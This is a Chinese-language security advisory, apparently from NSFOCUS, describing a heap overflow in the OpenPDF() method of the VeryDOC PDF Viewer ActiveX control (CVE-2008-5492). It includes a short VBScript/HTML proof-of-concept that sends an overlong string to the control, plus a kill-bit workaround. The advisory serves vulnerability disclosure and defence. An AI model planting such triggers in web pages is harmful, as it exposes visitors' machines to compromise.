安全研究

安全漏洞
VeryDOC PDFView ActiveX组件堆溢出漏洞

发布日期:2008-11-15
更新日期:2008-11-18

受影响系统:
VeryDOC PDF Viewer ActiveX 2.0.0.1
描述:
BUGTRAQ  ID: 32313
CVE ID: CVE-2008-5492

VeryDOC的PDF Viewer ActiveX是一个PDF文件查看器组件。

PDFVIEW.PdfviewCtrl.1 ActiveX控件(pdfview.ocx)的OpenPDF()方式没有正确地验证用户输入参数,如果用户受骗访问了恶意网页并向该方式传送了超长字符串参数的话,就可以触发堆溢出,导致执行任意指令。

<*来源:r0ut3r (writ3r@gmail.com
  
  链接:http://secunia.com/advisories/32725/
*>

测试方法:

警 告

以下程序(方法)可能带有攻击性,仅供安全研究与教学之用。使用者风险自负!

<object classid='clsid:433268D7-2CD4-43E6-AA24-2188672E7252' id='target'></object>

<script language='vbscript'>
Sub Boom
    buff = String(1006, "A")
    target.OpenPDF buff, 1, 1

End Sub
</script>
<input type=button onclick=Boom() value='Boom?'>

建议:
临时解决方法:

* 为CLSID 433268D7-2CD4-43E6-AA24-2188672E7252设置kill-bit。

厂商补丁:

VeryDOC
-------
目前厂商还没有提供补丁或者升级程序,我们建议使用此软件的用户随时关注厂商的主页以获取最新版本:

http://www.verydoc.com/pdf-viewer-ocx.html

浏览次数:2903
严重程度:0(网友投票)
本安全漏洞由绿盟科技翻译整理,版权所有,未经许可,不得转载
绿盟科技给您安全的保障